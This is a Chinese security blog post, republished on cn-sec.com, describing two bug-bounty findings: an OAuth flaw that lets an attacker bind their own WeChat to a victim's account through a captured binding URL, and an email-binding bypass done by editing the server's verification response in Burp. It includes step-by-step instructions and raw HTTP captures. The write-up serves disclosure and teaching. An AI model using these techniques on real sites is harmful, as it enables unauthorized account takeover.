分享两个Src实例

admin 2024年11月1日12:52:02评论12 views字数 3453阅读11分30秒阅读模式

No.0

前言

被隐雾老登逼着做分享,水了两个实战交差,大佬轻喷。

No.1

OAuth缺陷接管账号

原理:利用OAuth缺陷进行接管账号,生成自己微信的code,自己的微信绑定别人的账号,造成账号接管。

首先打开要绑定微信的页面

分享两个Src实例

点击去绑定微信

分享两个Src实例

然后打开burp拦截功能,打开手机微信扫码

分享两个Src实例

把这个包的URL记录下来,然后drop掉这个包(这里一定要注意,一定要drop掉,不能自己用了,每个code只能用一次),然后发送URL给受害者,他访问之后账号绑定到我们的微信。

这里用小号当受害者,点击上面的复制的url,受害者点击便成功绑定我的微信,接管账号

分享两个Src实例

No.2

任意邮箱绑定

先注册一个账号。

https://XXXX.com/login?

13XXXXXXX7,使用验证码登录进去。目前只有使用验证码和微信登录。

分享两个Src实例

登录进去来到个人信息页面,

分享两个Src实例

邮箱处显示未绑定,绑定的时候显示,验证下身份,这里不获取验证码,直接随便输入一个验证码。000000

抓包。

POST /api/user/verifyAccount HTTP/2Host: XXXXX.comCookie:XXXXXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brReferer: https://aXXXXX-Requested-With: XMLHttpRequestContent-Type: application/jsonX-Isuda-App-Locale: zh-CNCsrf-Token: Pg8sCbu1-vfqE2e3_VPM5DDgRFddtT3TFeicX-Isuda-Date: 2024-08-10T17:11:48ZLocale: zh-CNContent-Length: 40Origin: https://XXXXXXSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originPriority: u=0Te: trailers{"token":"000000","accountType":"phone"}

查看返回包,

HTTP/2 200 OKContent-Type: application/json; charset=utf-8Date: Sat, 10 Aug 2024 17:11:57 GMTEtag: W/"31-ladpSwO8jzDGrK+NNauEztTj9z4"Server: nginxServer-Timing: mid-FaviconMiddleWare; dur=0.022916Server-Timing: mid-EnsureDBConnected; dur=0.048112999999999996Server-Timing: mid-FlashMiddleWare; dur=1.3874149999999998Server-Timing: mid-Authenticate; dur=0.14233099999999999Server-Timing: mid-CSRFMiddleware; dur=0.132543Server-Timing: mid-ContextMiddleware; dur=0.31887Server-Timing: mid-DebugMiddleware; dur=0.008791Server-Timing: mid-OfflineMiddleWare; dur=1.2282Server-Timing: mid-OperationLogMiddleWare; dur=0.023925Server-Timing: mid-XmlMiddleware; dur=0.012435Server-Timing: mid-CORSMiddleware; dur=0.012601999999999999Server-Timing: mid-unknown; dur=5.681286999999999Server-Timing: mid-unknown; dur=0.014254999999999999Server-Timing: controller; dur=5.5088019371032715; desc="Controller"Server-Timing: context-get-company; dur=13.881817Server-Timing: total; dur=18.218661; desc="Total Response Time"Vary: Accept-EncodingVary: Accept-EncodingVary: X-HTTP-Method, X-HTTP-Method-Override, X-Method-OverrideX-Csrf-Token: uNvKgVnU-xmj2ri11jLmfmom9L8XxnlUNz7E{"status":1,"message":"手机验证码不匹配"}

将返回包修改

HTTP/2 200 OKContent-Type: application/json; charset=utf-8Date: Sat, 10 Aug 2024 17:11:57 GMTEtag: W/"31-ladpSwO8jzDGrK+NNauEztTj9z4"Server: nginxServer-Timing: mid-FaviconMiddleWare; dur=0.022916Server-Timing: mid-EnsureDBConnected; dur=0.048112999999999996Server-Timing: mid-FlashMiddleWare; dur=1.3874149999999998Server-Timing: mid-Authenticate; dur=0.14233099999999999Server-Timing: mid-CSRFMiddleware; dur=0.132543Server-Timing: mid-ContextMiddleware; dur=0.31887Server-Timing: mid-DebugMiddleware; dur=0.008791Server-Timing: mid-OfflineMiddleWare; dur=1.2282Server-Timing: mid-OperationLogMiddleWare; dur=0.023925Server-Timing: mid-XmlMiddleware; dur=0.012435Server-Timing: mid-CORSMiddleware; dur=0.012601999999999999Server-Timing: mid-unknown; dur=5.681286999999999Server-Timing: mid-unknown; dur=0.014254999999999999Server-Timing: controller; dur=5.5088019371032715; desc="Controller"Server-Timing: context-get-company; dur=13.881817Server-Timing: total; dur=18.218661; desc="Total Response Time"Vary: Accept-EncodingVary: Accept-EncodingVary: X-HTTP-Method, X-HTTP-Method-Override, X-Method-OverrideX-Csrf-Token: uNvKgVnU-xmj2ri11jLmfmom9L8XxnlUNz7E{"status":0,"message":"手机验证码不匹配"}
分享两个Src实例
分享两个Src实例

绕过了第一步,可直接绑定邮箱,

这里随意绑定邮箱即可。

分享两个Src实例

No.3

内心OS

挖洞也一段时间了,学费也回本了,老登一天求我们做分享,怪可怜的,他自己就不能写写嘛。

No.4

原文始发于微信公众号(隐雾安全):分享两个Src实例

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月1日12:52:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   分享两个Src实例https://cn-sec.com/archives/3342571.html

发表评论

匿名网友 填写信息